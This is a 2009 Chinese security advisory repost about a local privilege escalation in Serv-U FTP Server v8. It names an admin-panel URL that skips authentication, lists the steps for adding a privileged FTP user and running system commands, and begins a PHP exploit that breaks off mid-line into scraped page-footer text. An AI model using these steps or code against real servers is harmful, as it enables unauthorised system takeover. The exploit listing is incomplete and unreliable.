Serv-U FTP Server v8 本地提权

来源:岁月联盟 编辑:zhuzhu 时间:2009-08-09
Serv-U FTP Server v8 本地提权

作者:空虚浪子心

发布日期:2009-08-05
更新日期:2009-08-05

受影响系统:
serv-u8

不受影响系统:
其他版本不受影响

描述:
看cnbeta发现su出8这个版本了。
想想以前写过一个7的本地提权。
不知道8有什么安全方面的更改。
下载来研究下,发现居然还是可以提权的,只是su7的那个不能直接用,稍微修改了下执行的流程。

Su8的管理平台是http的,继承了su7的方式。
抓包,分析,发现了以下路程是可以利用的。
1, 管理员从管理控制台打开web页面时,是不需要验证密码的。
2, 管理员如果用某URL打开web页面时,虽然需要输入密码,但是无论输入什么,都可以进入。“/?Session=39893&Language=zh,CN&LocalAdmin=1”
3, 管理员可以添加用户有两种,一种是全局用户,一种是某个域下的用户。而权限设置也是两种,一种是全局,一种是针对用户。
4, 管理员添加了用户的这个包和设置权限这个包,是分开的。
所以,我可以抓包然后转换成php的socket连接post出去。
最后在用经典的ftp登陆,exec命令。达到提权。

前面su7已经说了很多,这里简单的说下好了。
.....登陆什么的。
1,获取ID。
2,给这个id添加权限。
3,给这个id赋予用户名,密码,目录,权限。
4,登陆后执行系统命令。

这段代码是不能直接当工具使用的。

<*来源:kxlzx(www.inbreak.net)
*>

测试方法:

以下程序(方法)可能带有安全性,仅供安全研究与教学之用。使用者风险自负!

<?/*serv-u 8 local exp ver 1.0如果你在自己的服务器上发现这个文件,厄。。。那太遗憾了,别来找我。这个文件到处都是,人人都能拿到。*/?><html><title>Serv-u 8 local exp ver 1.0</title><body><script>function fun_showDiv(show){document.getElementById(show).style.display="block";}</script><b>Serv-u 8 local exp ver 1.0</b><form id="form1" name="form1" method="post" action="?"><p><a href="#" onclick="fun_showDiv('adminpassdiv')">管理员密码</a><input type="text" name="admin_pwd" value="" /></p><p>直接提权!<input type="submit" name="cmd" value="提权" /><a href="#" onclick="fun_showDiv('QAdiv')">QA</a></p><pre><?//Global var$port=43958;$host="127.0.0.1";$sessionid="";$getuserid="";$ftpport=21;$ftpuser="lalala_hacked";$ftppwd=Serv-U FTP Server v8 本地提权_安全中国_全球最大网络安全培训门户
   > >    

Serv-U FTP Server v8 本地提权

更新时间:2009-08-09 00:19:26责任编辑:池天 
 $Content$

图片内容